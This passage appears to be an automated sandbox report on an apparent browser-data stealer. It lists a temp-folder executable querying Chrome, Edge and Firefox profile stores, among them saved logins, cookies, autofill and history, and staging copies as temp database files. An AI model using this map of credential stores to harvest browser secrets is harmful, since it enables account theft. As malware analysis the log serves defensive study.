                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\de VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\en-GB VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\bookmarkbackups VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashes\events VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
